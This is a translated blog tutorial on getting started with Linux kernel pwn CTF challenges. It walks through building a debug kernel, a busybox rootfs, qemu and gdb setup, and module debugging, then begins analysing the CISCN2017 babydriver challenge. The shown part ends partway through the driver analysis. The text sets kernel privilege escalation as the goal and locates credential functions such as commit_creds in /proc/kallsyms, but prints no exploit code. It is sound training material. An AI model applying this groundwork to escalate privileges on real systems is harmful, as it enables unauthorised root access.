Getting Started with Kernel Pwn CTF

2021-10-02


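I. Introduction

An introduction to kernel CTF challenges, based mainly on CTF-Wiki.

II. Environment Setup

Debugging the kernel calls for a good gdb plugin; gef is used here.

According to other players, peda and pwndbg run into many baffling problems when debugging a kernel.
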
pip3 install capstone unicorn keystone-engine ropper
git clone https://github.com/hugsy/gef.git
echo source `pwd`/gef/gef.py >> ~/.gdbinit

Download the Linux kernel tarball from the Tsinghua (TUNA) mirror and extract it:

curl -O -L https://mirrors.tuna.tsinghua.edu.cn/kernel/v5.x/linux-5.9.8.tar.xz
unxz linux-5.9.8.tar.xz
tar -xf linux-5.9.8.tar

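Enter the source directory and configure the build:

cd linux-5.9.8
make menuconfig

Enable the following options:
- Kernel hacking -> Compile-time checks and compiler options -> Compile the kernel with debug info
- Kernel hacking -> Generic Kernel Debugging Instruments -> KGDB: kernel debugger

Then save the configuration and exit.

Start building the kernel (the target architecture defaults to that of the build host; the rest of this post assumes a 64-bit x86 kernel):

make -j 8 bzImage

A plain make -j 8 is not recommended, because it builds a lot of things that will most likely never be used.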

A few pitfalls:
- Missing dependencies.

  Fix: install whatever the make error message asks for, for example:

  sudo apt-get install libelf-dev
- make[1]: *** No rule to make target 'debian/certs/debian-uefi-certs.pem', needed by 'certs/x509_certificate_list'. Stop.

  Fix: set CONFIG_SYSTEM_TRUSTED_KEYS in .config to an empty string, then run make again.

  #
  # Certificates for signature checking
  #
  # Set the value to empty; do not delete the entry itself.
  CONFIG_SYSTEM_TRUSTED_KEYS=""

The build is finished once the following output appears:

Setup is 15420 bytes (padded to 15872 bytes).
System is 5520 kB
CRC 70701790
Kernel: arch/x86/boot/bzImage is ready (#2)

Finally, before booting the kernel, build a root filesystem. Without one the kernel panics:

Kernel panic - not syncing: VFS: Unable to mount root fs on unknown-block(0,0)

First, download the busybox source:

wget https://busybox.net/downloads/busybox-1.34.1.tar.bz2
tar -jxf busybox-1.34.1.tar.bz2

Then configure and build it:

cd busybox-1.34.1
make menuconfig
make -j 8

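In menuconfig:

Under Settings, select Build static binary (no shared libs) so that busybox is statically linked (the kernel does not provide a libc).

Note that static linking needs the static C library as an extra dependency. Install it with:

# Red Hat / CentOS family:
sudo yum install glibc-static
# Debian / Ubuntu family:
sudo apt-get install libc6-dev

Under Linux System Utilities, deselect Support mounting NFS file systems on Linux < 2.6.23 (NEW).

The current version leaves this option off by default, so this step can be skipped.

After the build finishes, run make install. This generates the _install directory, which will become our rootfs.

Next, run the following inside _install to create the directories the init script needs:

mkdir -p proc sys dev etc/init.d

Then, in the rootfs (that is, inside _install), write the following init script, which mounts the pseudo-filesystems: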

#!/bin/sh
echo "INIT SCRIPT"
mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mount -t debugfs none /sys/kernel/debug
mount -t tmpfs none /tmp
echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
setsid /bin/cttyhack setuidgid 1000 /bin/sh

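Finally, make the init script executable and pack the rootfs:

chmod +x ./init
# pack
find . | cpio -o --format=newc > ../../rootfs.img
# unpack
# cpio -idmv < rootfs.img

Building and installing busybox is not strictly required for a rootfs, but it is strongly recommended because it provides many useful tools for working with the kernel.

Boot the kernel with qemu. These are the launch options recommended by CTF Wiki: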

#!/bin/sh
qemu-system-x86_64 \
    -m 64M \
    -nographic \
    -kernel ./arch/x86/boot/bzImage \
    -initrd  ./rootfs.img \
    -append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 nokaslr" \
    -smp cores=2,threads=1 \
    -cpu kvm64

To keep the number of options small, the author uses the following instead:

qemu-system-x86_64 \
  -kernel ./arch/x86/boot/bzImage \
  -initrd ./rootfs.img \
  -append "nokaslr"

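Fewer launch options let us ignore unnecessary details while getting started.

Only three options are set here:

-kernel: path to the kernel image bzImage

-initrd: the in-memory filesystem (initramfs) the kernel boots with

-append "nokaslr": disables kernel ASLR to make debugging easier

Note: be very careful not to type nokalsr instead of nokaslr. That typo cost the author a whole afternoon of kernel debugging...

And yes, the nokaslr on CTF Wiki was misspelled as nokalsr as well (lol).

Once booted, the built-in shell is ready to use.

III. Writing and Debugging a Kernel Driver

1. Building

Create a new directory inside the Linux kernel source tree:

linux-5.9.8 $ mkdir mydrivers

Then place the driver source ko_test.c in it. The code is copied from CTF-wiki: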

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
MODULE_LICENSE("Dual BSD/GPL");
static int ko_test_init(void) 
{
    printk("This is a test ko!\n");
    return 0;
}
static void ko_test_exit(void) 
{
    printk("Bye Bye~\n");
}
module_init(ko_test_init);
module_exit(ko_test_exit);

With the code in place, add a Makefile:

# Kernel modules to build
obj-m += ko_test.o

# Path to the kernel source tree
KDIR =/usr/class/kernel_pwn/linux-5.9.8

# -C switches to the kernel source tree before building.
# M= points back at the driver source directory, so the module is built and emitted there.
all:
	$(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
	rm -rf *.o *.ko *.mod.* *.symvers *.order

Notes:
The file name Makefile must start with an uppercase M; otherwise the build fails with:

scripts/Makefile.build:44: /usr/class/kernel_pwn/linux-5.9.8/mydrivers/Makefile: No such file or directory
make[2]: *** No rule to make target '/usr/class/kernel_pwn/linux-5.9.8/mydrivers/Makefile'.  Stop.

obj-m in the Makefile must match the driver source file name; otherwise the build fails with:

make[2]: *** No rule to make target '/usr/class/kernel_pwn/linux-5.9.8/mydrivers/ko_test.o', needed by '/usr/class/kernel_pwn/linux-5.9.8/mydrivers/ko_test.mod'.  Stop.

If make reports the following error:

makefile:6: *** missing separator.  Stop.

open the Makefile in vim, press i to enter insert mode, replace the leading spaces before the make command with a tab, then press Esc and type :wq to save.

Finally, run make to build the driver. The directory then looks as follows:

Only ko_test.ko matters here.

$ tree                  
.
├── ko_test.c
├── ko_test.ko
├── ko_test.mod
├── ko_test.mod.c
├── ko_test.mod.o
├── ko_test.o
├── Makefile
├── modules.order
└── Module.symvers

0 directories, 9 files

2. Running

Copy the freshly built *.ko file into the rootfs directory (busybox-1.34.1/_install),

then edit busybox-1.34.1/_install/init as shown in the diff below:

/bin/sh has to be started as root here so that it is allowed to run dmesg.

#!/bin/sh
echo "INIT SCRIPT"
mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs none /dev
mount -t debugfs none /sys/kernel/debug
mount -t tmpfs none /tmp
+ insmod /ko_test.ko # load the kernel module
echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
- setsid /bin/cttyhack setuidgid 1000 /bin/sh
+ setsid /bin/cttyhack setuidgid 0 /bin/sh # use uid/gid 0 so that /bin/sh runs as root
+ poweroff -f # power off the machine once the shell exits

Repack the rootfs and run qemu, then type dmesg to confirm that the ko_test module was loaded:

Normally qemu pops up a small GUI window. To use the current terminal as the console instead (as in the screenshot above), pass these extra options to qemu:

-nographic

-append "console=ttyS0"

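3. Debugging

a. attach qemu

It is best to run /bin/sh as root while debugging; how to do that was described above.

Start qemu with the extra option -gdb tcp::1234 (or the equivalent -s) and qemu will be ready for gdb to attach. To make qemu halt immediately at startup, also pass -S.

In addition, for the vmlinux symbol table to be usable, pass -append "nokaslr" to disable kernel ASLR. Only then do the symbols line up with the actual addresses in memory; otherwise breakpoints on the target functions cannot be set.

After qemu starts, open another terminal and run gdb -q -ex "target remote localhost:1234" to attach to qemu.

Once attached, gdb can load the vmlinux symbol table, set breakpoints on specific functions, and continue until the target function is reached.

# with -S, qemu starts halted; enter the following in gdb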
gef> add-symbol-file vmlinux
gef> b start_kernel
gef> continue

[Breakpoint 1, start_kernel () at init/main.c:837]
......

We can also look up where kernel symbols are loaded in memory with the following commands:

# grep <symbol_name> /proc/kallsyms
grep prepare_kernel_cred  /proc/kallsyms
grep commit_creds  /proc/kallsyms
grep ko_test_init  /proc/kallsyms

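Pitfall 1: the author originally wrote this shell script:

# other setup
[...]
# start qemu in the **background**
qemu-system-x86_64 [other args] &
# open GDB directly in the current terminal
gdb -q -ex "target remote localhost:1234"

With this script, pressing Ctrl+C in GDB sends SIGINT to qemu as well, which kills qemu instead of pausing the guest kernel. gdb therefore has to run in a separate terminal for Ctrl+C to be handled properly.

The corrected script:

# other setup
[...]
# start qemu in the **background**
qemu-system-x86_64 [other args] &
# open a new terminal and start GDB there
gnome-terminal -e 'gdb -q -ex "target remote localhost:1234"'

Pitfall 2: with the gef plugin, it is best not to connect with the plain target remote localhost:1234 command (which needs no root privileges); otherwise gef reports the following error: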

gef➤  target remote localhost:1234
Remote debugging using localhost:1234
warning: No executable has been specified and target does not support
determining executable automatically.  Try using the "file" command.
0x000000000000fff0 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────── registers ────────────────────────────────────
[!] Command 'context' failed to execute properly, reason: 'NoneType' object has no attribute 'all_registers'

Instead, connect to qemu with the better-behaved gef-remote command (which needs root privileges):

# the architecture must be set beforehand
set architecture i386:x86-64
gef-remote --qemu-mode localhost:1234

Pitfall 3: if gef reports the following error when qemu stops at start_kernel:

[!] Command 'context' failed to execute properly, reason: max() arg is an empty sequence

just single-step once with ni.

b. attach drivers

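1) General procedure

First, load the target driver into the kernel:

insmod <driver_module_name>

Then, inside qemu, find the load base address of the driver's text section:

# list loaded modules
lsmod
# get the base address the driver was loaded at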
grep <target_module_name> /proc/modules
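The base address can also be pulled out of a /proc/modules line programmatically. The following is a minimal sketch, not part of the original setup: the helper name module_base_from_line and its signature are made up for illustration, and it assumes the usual field order "name size refcount dependencies state address", as in the babydriver line shown later in this post.

```c
#include <stdio.h>
#include <string.h>

/*
 * Parse one line of /proc/modules and, if it describes module `name`,
 * store its load address in *base and return 1; otherwise return 0.
 * (Hypothetical helper; the field layout is an assumption stated above.)
 */
static int module_base_from_line(const char *line, const char *name,
                                 unsigned long long *base)
{
    char mod[64];
    unsigned long long addr;

    /* fields: name size refcount dependencies state address [taints] */
    if (sscanf(line, "%63s %*u %*d %*s %*s %llx", mod, &addr) != 2)
        return 0;
    if (strcmp(mod, name) != 0)
        return 0;
    *base = addr;
    return 1;
}
```

Feeding it each line read from /proc/modules (as root, so the address is not hidden) yields the value to pass to add-symbol-file.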

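In the gdb window, load the debug symbols with:

add-symbol-file mydrivers/ko_test.ko <ko_test_base_addr> [-s <section1_name> <section1_addr>] ...

Note: unlike vmlinux, loading a kernel module's symbols with add-symbol-file requires the base address of the module's text section.

The kernel lives at a well-known virtual address (the same as the load address of the vmlinux ELF file), but a kernel module is only a relocatable object with no valid load address of its own. Its location is decided only when the kernel's module loader allocates memory and chooses where each loadable section goes, so we cannot know in advance where a module will land. When loading the symbol file into gdb we should therefore explicitly specify the address of as many sections as possible.

The more section addresses are specified, the better. If only the .text base is given, breakpoints on functions may fail to trigger, which makes debugging painful.

To list the load address of each section of the target module, run:

grep "0x" /sys/module/ko_test/sections/.*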
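Typing a long add-symbol-file command by hand is error-prone, so it can help to generate it from the section list. This is only a sketch under assumptions: struct section_addr and build_add_symbol_file are hypothetical names, and the addresses would come from the grep output above.

```c
#include <stdio.h>

struct section_addr {
    const char *name;          /* section name, e.g. ".rodata.str1.1" */
    unsigned long long addr;   /* address read from /sys/module/<mod>/sections/<name> */
};

/*
 * Format "add-symbol-file <ko> <text_addr> -s <name> <addr> ..." into out.
 * Returns the number of characters written, or -1 if out is too small.
 */
static int build_add_symbol_file(char *out, size_t cap, const char *ko_path,
                                 unsigned long long text_addr,
                                 const struct section_addr *secs, size_t n)
{
    int used = snprintf(out, cap, "add-symbol-file %s 0x%llx", ko_path, text_addr);
    if (used < 0 || (size_t)used >= cap)
        return -1;

    for (size_t i = 0; i < n; i++) {
        size_t left = cap - (size_t)used;
        int w = snprintf(out + used, left, " -s %s 0x%llx",
                         secs[i].name, secs[i].addr);
        if (w < 0 || (size_t)w >= left)
            return -1;   /* would have been truncated */
        used += w;
    }
    return used;
}
```

The resulting string can be pasted into gdb or written into a gdb command file.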

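2) Example

A small example: the steps to debug ko_test.ko are as follows.

First, run the following in the kernel shell inside qemu:

# load ko_test into the kernel
insmod /ko_test.ko
# check where ko_test was loaded
grep ko_test /proc/modules
grep "0x" /sys/module/ko_test/sections/.*

The output is as follows:

Note these addresses, then switch to gdb, press Ctrl+C to pause the kernel, and enter:

# load the symbols at the matching addresses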
add-symbol-file mydrivers/ko_test.ko  0xffffffffc0002000 \
                    -s .rodata.str1.1 0xffffffffc000304c \
                    -s .symtab        0xffffffffc0007000 \
                    -s .text.unlikely 0xffffffffc0002000
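# set breakpoints
b ko_test_init
b ko_test_exit
# let the kernel continue
continue

Finally, back in qemu, run the following in the kernel shell:

# unload ko_test
rmmod ko_test

gdb now stops in ko_test_exit:

If ko_test is loaded again after being unloaded,

insmod /ko_test.ko

gdb immediately stops in ko_test_init:

This is probably because nokaslr makes the same driver load at the same base address every time.

This way of debugging a module's init function is a small trick: it relies on the same driver being reloaded at the same base address under nokaslr. The more correct way to debug an init function is to follow the control flow of do_init_module to obtain the base address. The steps are as follows.

We trace do_init_module because it is called from load_module. After load_module has done a large amount of work loading the module into memory, it finally calls do_init_module, which runs the module's init function and then cleans up.

load_module itself is called from the init_module system call.

First let the kernel run freely. Once it has booted and the shell prompt appears, press Ctrl+C in gdb and set a breakpoint on do_init_module. The first half of this function runs the module's init function: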

/*
 * This is where the real work happens.
 *
 * Keep it uninlined to provide a reliable breakpoint target, e.g. for the gdb
 * helper command 'lx-symbols'.
 */
static noinline int do_init_module(struct module *mod)
{
  [...]
  /* Start the module */
  if (mod->init != NULL)
    ret = do_one_initcall(mod->init);   // <- ko_test_init runs here
  if (ret < 0) {
    goto fail_free_freeinit;
  }
  [...]
}

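Type continue in gdb to let the kernel run again. Then run insmod /ko_test.ko in the kernel shell to load the module; gdb will stop. Inspect mod->init in gdb to get the address of the module's init function.

To see all section addresses of the current module, enter the following in gdb:

# number of sections in the current module
p mod->sect_attrs->nsections
# information about the third section
p mod->sect_attrs->attrs[2]

With every section name and base address of the module in hand, the symbol file can be loaded as described earlier.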

c. Launch script

Setting up the environment is incredibly tedious, but that's it for now :)

The author bundled the launch commands into one shell script for one-click startup:

#!/bin/bash

# Check for root; elevated privileges are needed for gef-remote --qemu-mode
if [ "$(id -u)" -ne 0 ]; then
    echo "Please run this script as root"
    exit 1
fi

# copy the drivers into the rootfs
cp ./mydrivers/*.ko busybox-1.34.1/_install

# build the rootfs
pushd busybox-1.34.1/_install
find . | cpio -o --format=newc > ../../rootfs.img
popd

# start qemu
qemu-system-x86_64 \
    -kernel ./arch/x86/boot/bzImage \
    -initrd ./rootfs.img \
    -append "nokaslr" \
    -s  \
    -S &

    # -s: shorthand for -gdb tcp::1234; opens qemu's gdb stub
    # -S: halt the guest immediately at startup

    # -nographic                # disable the QEMU GUI
    # -append "console=ttyS0"   # together with -nographic, the console becomes the current terminal

gnome-terminal -e 'gdb -x mygdbinit'

The contents of mygdbinit:

set architecture i386:x86-64
add-symbol-file vmlinux
gef-remote --qemu-mode localhost:1234

b start_kernel
c

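IV. First Challenge

CISCN2017_babydriver is the author's first kernel challenge. It was chosen because plenty of write-ups are available online, which makes it easy to learn from.

1. Challenge files

The challenge files can be downloaded here.

The challenge provides three files:

boot.sh: launch script
bzImage: kernel image
rootfs.cpio: root filesystem image

2. First run

To begin, simply extract babydriver.tar and run the launch script:

# extract
mkdir babydriver
tar -xf babydriver.tar -C babydriver
# launch
cd babydriver 
./boot.sh

But KVM fails with the following error:

Could not access KVM kernel module: No such file or directory
qemu-system-x86_64: failed to initialize kvm: No such file or directory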

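Use the following command to check whether the Linux guest running in VMware supports virtualization. The output was empty, meaning it does not.

grep -E '^flags.*(vmx|svm)' /proc/cpuinfo

The virtualization settings on the physical machine were all enabled. Checking the VMware CPU settings next showed that Virtualize Intel VT-x/EPT or AMD-V/RVI was not ticked.

After ticking it and restarting the Linux VM, VMware reported that virtualized Intel VT-x/EPT is not supported on this platform...

Some searching showed that Hyper-V had not been fully disabled. To disable it completely:

Control Panel -> Programs -> Turn Windows features on or off: untick Hyper-V and confirm to disable the Hyper-V service
Open cmd as administrator and run bcdedit /set hypervisorlaunchtype off

To re-enable it later, run bcdedit /set hypervisorlaunchtype auto
Reboot the computer

After that, start the Linux VM in VMware again and KVM inside it works normally.

3. Analysis

a. Goal

A look at /init in the root filesystem shows that this challenge requires kernel privilege escalation: the flag can only be read after becoming root.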

#!/bin/sh
 
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag                      # the flag is made readable by root only
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /lib/modules/4.4.72/babydriver.ko   # load the vulnerable driver
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh

umount /proc
umount /sys
poweroff -d 0  -f

b. Extracting the target kernel module

Before escalating privileges, we need to pull out the driver that gets loaded into the kernel; it is very likely the vulnerable component.

First check the format of rootfs.cpio with the file command:

$ file rootfs.cpio
rootfs.cpio: gzip compressed data, last modified: Tue Jul 4 08:39:15 2017, max compression, from Unix, original size modulo 2^32 2844672

It is a gzip file, so rename it first; otherwise gunzip does not recognize the suffix. Then decompress the gzip layer and unpack the cpio archive:

mv rootfs.cpio rootfs.cpio.gz
gunzip rootfs.cpio.gz

The decompressed file is an ordinary CPIO archive:

$ file rootfs.cpio
rootfs.cpio: ASCII cpio archive (SVR4 with no CRC)
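What file reports here comes down to the first few bytes of the image. As a rough sketch (the enum and function names are made up for illustration), the two formats seen above can be told apart like this: gzip streams start with the bytes 0x1f 0x8b, and a "newc" (SVR4 without CRC) cpio archive starts with the ASCII magic 070701.

```c
#include <stddef.h>
#include <string.h>

enum image_kind { IMG_UNKNOWN, IMG_GZIP, IMG_CPIO_NEWC };

/* Classify a rootfs image by its leading magic bytes. */
static enum image_kind classify_image(const unsigned char *buf, size_t len)
{
    if (len >= 2 && buf[0] == 0x1f && buf[1] == 0x8b)
        return IMG_GZIP;            /* needs gunzip before cpio */
    if (len >= 6 && memcmp(buf, "070701", 6) == 0)
        return IMG_CPIO_NEWC;       /* can be unpacked with cpio directly */
    return IMG_UNKNOWN;
}
```

A helper script could read the first six bytes of rootfs.cpio and decide whether the gunzip step is needed before unpacking.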

Unpack it the usual way:

cpio -idmv < rootfs.cpio

After unpacking, the target driver is at /lib/modules/4.4.72/babydriver.ko.

c. Checking protections

First, the protections on the driver itself:

$ checksec babydriver.ko
[*] '/usr/class/kernel_pwn/CISCN2017-babydriver/babydriver/babydriver.ko'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x0)

Only NX is enabled.

Next, the qemu launch options show that SMEP is enabled.

#!/bin/bash

qemu-system-x86_64 \
    -initrd rootfs.cpio \
    -kernel bzImage \
    -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
    -enable-kvm \
    -monitor /dev/null \
    -m 64M \
    --nographic  \
    -smp cores=1,threads=1 \
    -cpu kvm64,+smep      # <- +smep enables SMEP

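SMEP (Supervisor Mode Execution Protection): prevents the CPU from executing user-space code while it is in ring 0.

A closely related protection is SMAP (Supervisor Mode Access Protection): it prevents the kernel from accessing user-space data.

Note that KASLR is not enabled.

d. Code analysis

This being a first kernel challenge, the code deserves a careful read. We go through the driver's functions one by one.

1) babydriver_init

1.1) Key code

Code first. Focus on the parts inside the red boxes (the rest is error handling).

Simplified, the key code is: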

alloc_chrdev_region(&babydev_no, 0, 1, "babydev");

cdev_init(&cdev_0, &fops);
cdev_0.owner = &_this_module;

cdev_add(&cdev_0, babydev_no, 1);

babydev_class = _class_create(&_this_module, "babydev", &babydev_no);

device_create(babydev_class, 0, babydev_no, 0, "babydev");

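Before explaining this code, a short detour into device files.

1.2) Device numbers

Devices fall into three classes:

Character devices (char device), e.g. the console
Block devices (block device), e.g. disks that host file systems
Network devices (network device), e.g. network cards

Device files are accessed by name and usually live under /dev. The first character of each ls -l entry indicates the type of the file:

# c: character device
crw-rw-rw-   1 root tty       5,   0 Oct  3 15:03 0
# l: symbolic link
lrwxrwxrwx   1 root root          15 Oct  2 23:43 stdout -> /proc/self/fd/1
# -: regular file
-rw-rw-r--  1 Kiprey Kiprey  203792 Jun 16  2017 babydriver.ko

In a device file entry, two comma-separated numbers appear just before the last-modified date, such as 5, 0 above (for regular files this position shows the file length). This pair is the device's major number and minor number.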

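Traditionally, the major number identifies the driver associated with the device. For example, /dev/null and /dev/zero are both managed by driver 1, while the serial terminals (ttyX, ttySX) are managed by driver 4. Modern Linux kernels allow several drivers to share a major number, but most devices are still organized as one major number per driver.

The kernel uses the minor number to determine which device is being referred to, and that is all it is used for; the kernel knows nothing more about a particular minor number.

The major and minor numbers are stored together in the type dev_t, which is really a u32: 12 bits hold the major number and 20 bits hold the minor number.

typedef u32 __kernel_dev_t;
typedef __kernel_dev_t dev_t;

When a driver needs the major or minor number, it should not do the bit arithmetic by hand but use the macros from <linux/kdev_t.h>: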

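#define MINORBITS     20
#define MINORMASK     ((1U << MINORBITS) - 1)
#define MAJOR(dev)    ((unsigned int) ((dev) >> MINORBITS))   // extract the major number
#define MINOR(dev)    ((unsigned int) ((dev) & MINORMASK))    // extract the minor number
#define MKDEV(ma,mi)  (((ma) << MINORBITS) | (mi))            // build a dev_t from a major/minor pair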
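The 12-bit/20-bit split described above can be checked in user space. The following sketch mirrors the in-kernel encoding with its own names (the sketch_ prefix marks them as illustrative, not kernel APIs) and packs the 5, 0 pair from the ls output.

```c
#include <stdint.h>

#define SKETCH_MINORBITS 20u
#define SKETCH_MINORMASK ((1u << SKETCH_MINORBITS) - 1u)

/* Pack a major/minor pair into one 32-bit value: major in the top 12 bits. */
static uint32_t sketch_mkdev(uint32_t major, uint32_t minor)
{
    return (major << SKETCH_MINORBITS) | (minor & SKETCH_MINORMASK);
}

/* Recover the major number (upper 12 bits). */
static uint32_t sketch_major(uint32_t dev)
{
    return dev >> SKETCH_MINORBITS;
}

/* Recover the minor number (lower 20 bits). */
static uint32_t sketch_minor(uint32_t dev)
{
    return dev & SKETCH_MINORMASK;
}
```

With this layout the pair 5, 0 is stored as 0x500000, and splitting that value gives back 5 and 0.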

That is enough about device files for now; back to the challenge.

First, babydriver_init calls alloc_chrdev_region, which is declared as follows:

/**
 * alloc_chrdev_region() - register a range of char device numbers
 * @dev: output parameter for first assigned number
 * @baseminor: first of the requested range of minor numbers
 * @count: the number of minor numbers required
 * @name: the name of the associated device or driver
 *
 * Allocates a range of char device numbers.  The major number will be
 * chosen dynamically, and returned (along with the first minor number)
 * in @dev.  Returns zero or a negative error code.
 */
int alloc_chrdev_region(dev_t *dev, unsigned baseminor, unsigned count,
      const char *name)

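From the call in this driver:

alloc_chrdev_region(&babydev_no, 0, 1, "babydev");

it is clear that babydriver_init asks the kernel for a new character-device major number, with minor numbers starting at 0 and the device name babydev, and stores the resulting major/minor pair in the global variable babydev_no.

There is also a function named register_chrdev_region. It takes the starting major/minor number from the caller and asks the kernel to allocate from there, so it is similar to alloc_chrdev_region but not the same.

Once the device number is allocated, it has to be connected to the internal functions that implement the device's operations.

1.3) Registering the character device

The kernel represents character devices with struct cdev, so one such structure must be initialized and registered before the device can be operated on.

Note that a single driver may allocate more than one device number and create more than one device.

The driver does this with:

cdev_init(&cdev_0, &fops);

The initializer for struct cdev is: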

/**
 * cdev_init() - initialize a cdev structure
 * @cdev: the structure to initialize
 * @fops: the file_operations for this device
 *
 * Initializes @cdev, remembering @fops, making it ready to add to the
 * system with cdev_add().
 */
void cdev_init(struct cdev *cdev, const struct file_operations *fops)

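As the comment says, the struct cdev behind the pointer is initialized and the device's operations are set to the given file_operations pointer.

struct file_operations contains a large number of function pointers: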

struct file_operations {
  struct module *owner;
  loff_t (*llseek) (struct file *, loff_t, int);
  ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
  ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
  ssize_t (*read_iter) (struct kiocb *, struct iov_iter *);
  ssize_t (*write_iter) (struct kiocb *, struct iov_iter *);
  int (*iopoll)(struct kiocb *kiocb, bool spin);
  int (*iterate) (struct file *, struct dir_context *);
  int (*iterate_shared) (struct file *, struct dir_context *);
  __poll_t (*poll) (struct file *, struct poll_table_struct *);
  long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long);
  long (*compat_ioctl) (struct file *, unsigned int, unsigned long);
  int (*mmap) (struct file *, struct vm_area_struct *);
  unsigned long mmap_supported_flags;
  int (*open) (struct inode *, struct file *);
  int (*flush) (struct file *, fl_owner_t id);
  int (*release) (struct inode *, struct file *);
  int (*fsync) (struct file *, loff_t, loff_t, int datasync);
  int (*fasync) (int, struct file *, int);
  int (*lock) (struct file *, int, struct file_lock *);
  ssize_t (*sendpage) (struct file *, struct page *, int, size_t, loff_t *, int);
  unsigned long (*get_unmapped_area)(struct file *, unsigned long, unsigned long, unsigned long, unsigned long);
  int (*check_flags)(int);
  int (*flock) (struct file *, int, struct file_lock *);
  ssize_t (*splice_write)(struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int);
  ssize_t (*splice_read)(struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int);
  int (*setlease)(struct file *, long, struct file_lock **, void **);
  long (*fallocate)(struct file *file, int mode, loff_t offset,
        loff_t len);
  void (*show_fdinfo)(struct seq_file *m, struct file *f);
#ifndef CONFIG_MMU
  unsigned (*mmap_capabilities)(struct file *);
#endif
  ssize_t (*copy_file_range)(struct file *, loff_t, struct file *,
      loff_t, size_t, unsigned int);
  loff_t (*remap_file_range)(struct file *file_in, loff_t pos_in,
           struct file *file_out, loff_t pos_out,
           loff_t len, unsigned int remap_flags);
  int (*fadvise)(struct file *, loff_t, loff_t, int);
} __randomize_layout;

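This challenge only uses a small subset of them, namely /baby(open|release|read|write|ioctl)/.

The owner field of struct file_operations must point to the current kernel module; the macro THIS_MODULE yields that pointer.

Once the cdev is initialized, the last step is to tell the kernel its device number with cdev_add.

cdev_add(&cdev_0, babydev_no, 1);

cdev_add is declared as follows: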

/**
 * cdev_add() - add a char device to the system
 * @p: the cdev structure for the device
 * @dev: the first device number for which this device is responsible
 * @count: the number of consecutive minor numbers corresponding to this
 *         device
 *
 * cdev_add() adds the device represented by @p to the system, making it
 * live immediately.  A negative error code is returned on failure.
 */
int cdev_add(struct cdev *p, dev_t dev, unsigned count)

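Note that as soon as cdev_add returns, the device is live and its operations may be called by the kernel immediately. A driver must therefore call cdev_add only after it is fully ready to handle operations on the device.

1.4) Registering the device in sysfs

After the cdev has been registered with the kernel, the init function runs the following code to register the device node in sysfs.

babydev_class = class_create(THIS_MODULE, "babydev");
device_create(babydev_class, 0, babydev_no, 0, "babydev");

class_create and device_create are declared as follows: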

/* This is a #define to keep the compiler from merging different
 * instances of the __key variable */
#define class_create(owner, name)    \
({            \
  static struct lock_class_key __key;  \
  __class_create(owner, name, &__key);  \
})

/**
 * class_create - create a struct class structure
 * @owner: pointer to the module that is to "own" this struct class
 * @name: pointer to a string for the name of this class.
 * @key: the lock_class_key for this class; used by mutex lock debugging
 *
 * This is used to create a struct class pointer that can then be used
 * in calls to device_create().
 *
 * Returns &struct class pointer on success, or ERR_PTR() on error.
 *
 * Note, the pointer created here is to be destroyed when finished by
 * making a call to class_destroy().
 */
struct class *__class_create(struct module *owner, const char *name,
           struct lock_class_key *key)
    
/**
 * device_create - creates a device and registers it with sysfs
 * @class: pointer to the struct class that this device should be registered to
 * @parent: pointer to the parent struct device of this new device, if any
 * @devt: the dev_t for the char device to be added
 * @drvdata: the data to be added to the device for callbacks
 * @fmt: string for the device's name
 *
 * This function can be used by char device classes.  A struct device
 * will be created in sysfs, registered to the specified class.
 *
 * A "dev" file will be created, showing the dev_t for the device, if
 * the dev_t is not 0,0.
 * If a pointer to a parent struct device is passed in, the newly created
 * struct device will be a child of that device in sysfs.
 * The pointer to the struct device will be returned from the call.
 * Any further sysfs files that might be required can be created using this
 * pointer.
 *
 * Returns &struct device pointer on success, or ERR_PTR() on error.
 *
 * Note: the struct class passed to this function must have previously
 * been created with a call to class_create().
 */
struct device *device_create(struct class *class, struct device *parent,
           dev_t devt, void *drvdata, const char *fmt, ...)

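The init function first calls class_create to create a struct class. The class lives in sysfs and can be found under /sys/class.

It then calls device_create to create and initialize a logical device, associate it with the class given as the first argument, and add it to the kernel's device driver model. As a result, a new device directory appears under /sys/devices/virtual and a matching device file is created under /dev.

The net effect is that the device shows up in /dev.

1.5) Summary of the init function

In summary, babydriver_init does the following:

Requests a free device number from the kernel
Declares a struct cdev, initializes it and binds it to the device number
Creates a new struct class and registers the device for that device number in sysfs

2) babydriver_exit

With init understood, the exit function is simple: it frees every data structure that needs freeing.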

void __cdecl babydriver_exit()
{
  device_destroy(babydev_class, babydev_no);
  class_destroy(babydev_class);
  cdev_del(&cdev_0);
  unregister_chrdev_region(babydev_no, 1LL);
}

3) babyopen

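The function's code is as follows:

babyopen sets up a babydev_struct in the kernel, which contains a device_buf pointer and a device_buf_len member.

Note that kmem_cache_alloc_trace allocates memory much like kmalloc; the author suspects that the decompiled code is what a kmalloc call looks like after being inlined and optimized: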

/**
 * kmalloc - allocate memory
 * @size: how many bytes of memory are required.
 * @flags: the type of memory to allocate.
 *
 * kmalloc is the normal method of allocating memory
 * for objects smaller than page size in the kernel.
 *
 * The allocated object address is aligned to at least ARCH_KMALLOC_MINALIGN
 * bytes. For @size of power of two bytes, the alignment is also guaranteed
 * to be at least to the size.
 *
 * The @flags argument may be one of the GFP flags defined at
 * include/linux/gfp.h and described at
 * :ref:`Documentation/core-api/mm-api.rst <mm-api-gfp-flags>`
 *
 * The recommended usage of the @flags is described at
 * :ref:`Documentation/core-api/memory-allocation.rst <memory_allocation>`
 *
 * Below is a brief outline of the most useful GFP flags
 *
 * %GFP_KERNEL
